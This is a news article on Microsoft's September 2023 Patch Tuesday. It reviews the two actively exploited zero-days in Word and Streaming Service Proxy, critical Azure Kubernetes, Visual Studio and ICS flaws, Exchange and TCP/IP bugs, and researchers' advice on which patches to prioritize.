Microsoft Patches a Pair of Actively Exploited Zero-Days

Five critical bugs, zero-days exploited in the wild, Exchange Server, and more headline Microsofts September 2023 Patch Tuesday release. Heres what to patch now.

Microsoft addressed five critical security vulnerabilities in its September Patch Tuesday update, along with two important-rated zero-days under active attack in the wild.
In total, Microsoft released 59 new patches addressing bugs across the product gamut: They affect Microsoft Windows, Exchange Server, Office, .NET and Visual Studio, Azure, Microsoft Dynamics, and Windows Defender.
The update also incorporates a handful of third-party issues, including an
actively exploited, critical Chromium zero-day bug
that affects Microsoft Edge. With the external issues, the number of CVEs total 65.
Despite the breadth of the fixes, researchers noted that patching prioritization is fairly straightforward this month, with the zero-days, critical bugs, and issues in Microsoft Exchange Server and the Windows implementation of the TCP/IP protocol needing to head to the front of the line for most organizations.
While two of the CVEs are listed as being used by threat actors in the wild prior to patching, only one is listed as publicly known. Both should be on the top of the list for patching, for obvious reasons.
The public bug is found in Microsoft Word (
CVE-2023-36761
, CVSS 6.2); its classified as an information disclosure issue, but Dustin Childs, researcher with Trend Micros Zero Day Initiative (ZDI), noted that this belies its gravity.
An attacker could use this vulnerability to allow the disclosure of NTLM hashes, which would then presumably be used in an
NTLM-relay style attack
, he explained in a Tuesday
posting on Microsofts September patch release
. Regardless of the classification, the preview pane is a vector here as well, which means no user interaction is required. Definitely put this one on the top of your test-and-deploy list.
The other zero-day exists in the Windows operating system (
CVE-2023-36802
, CVSS 7.8), specifically in Microsoft Streams streaming service proxy (formerly known as Office 365 Video). For successful exploitation, an attacker would need to run a specially crafted program that would allow privilege escalation to either administrator or system privileges, according to the advisory.
It is the eighth elevation of privilege zero-day vulnerability exploited in the wild in 2023, Satnam Narang, senior staff research engineer at Tenable, tells Dark Reading. Because attackers have a
myriad of ways of breaching organizations
, simply getting access to a system may not always be enough, which is where elevation of privilege flaws become that much more valuable, especially zero-days.
When it comes to the critical bugs, one of the more concerning is
CVE-2023-29332
, found in Microsofts Azure Kubernetes service. It could allow a remote, unauthenticated attacker to gain
Kubernetes Cluster
administration privileges.
This one stands out as it can be reached from the Internet, requires no user interaction, and is listed as low complexity, Childs warned in his post. Based on the remote, unauthenticated aspect of this bug, this could prove quite tempting for attackers.
Three of the critical-rated patches are RCE problems that affect Visual Studio (
CVE-2023-36792
,
CVE-2023-36793
, and
CVE-2023-36796
, all with a CVSS score of 7.8). All of them could lead to arbitrary code execution when opening a malicious package file with an affected version of the software.
Given Visual Studios
widespread usage among developers
, the impact of such vulnerabilities could have a domino effect, spreading harm well beyond the initially compromised system, Tom Bowyer, Automox manager for product security,
said in a post
. In the worst-case scenario, this could mean the theft or corruption of proprietary source code, the introduction of backdoors, or malicious tampering that could turn your application into a launchpad for attacks on others.
The final critical issue is
CVE-2023-38148
(CVSS 8.8, the most severe that Microsoft patched this month), which allows unauthenticated remote code execution via the Internet Connection Sharing (ICS) function in Windows. Its risk is mitigated by the fact that an attacker would need to be network-adjacent; further, most organizations no longer use ICS. However, those still using it should patch immediately.
If attackers successfully exploit this vulnerability, there could be a total loss of confidentiality, integrity, and availability, says Natalie Silva, lead cybersecurity engineer for Immersive Labs. An unauthorized attacker could exploit this vulnerability by sending a specially crafted network packet to the service. This could lead to the execution of arbitrary code, potentially resulting in unauthorized access, data manipulation, or disruption of services.
Also included in the September update are a set of Microsoft Exchange Server bugs that are deemed more likely to be exploited.
The trio of issues (
CVE-2023-36744
,
CVE-2023-36745
, and
CVE-2023-36756
, all with a CVSS rating of 8.0) affect versions 2016-2019 and allow for RCE attacks against the service.
While none of these attacks result in RCE on the server itself, it could allow a network-adjacent attacker with valid credentials to alter user data or elicit a Net-NTLMv2 hash for a targeted user account, which in turn could be cracked to recover a user password or relayed internally in the network to attack another service, says Robert Reeves, principal cybersecurity engineer at Immersive.
He adds, If privileged users — those with Domain Admin or similar permissions within the network — have a mailbox created on Exchange, contrary to Microsofts security advice, such a relay attack could have significant consequences.
And finally, researchers at Automox flagged a denial-of-service (DoS) vulnerability in Windows TCP/IP (
CVE-2023-38149
, CVSS 7.5) as one to prioritize.
The bug affects any networked system, and allows an attacker via a network vector to disrupt the service without any user authentication or high complexity, said Automox CISO Jason Kikta, in
a breakdown of Patch Tuesday
. This vulnerability represents a significant threat ... to the digital landscape. These weaknesses can be exploited to overload servers, disrupting the normal functioning of networks and services, and causing them to become unavailable to users.
All of that said, systems with IPv6 disabled are not affected.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Microsoft Patches a Pair of Actively Exploited Zero-Days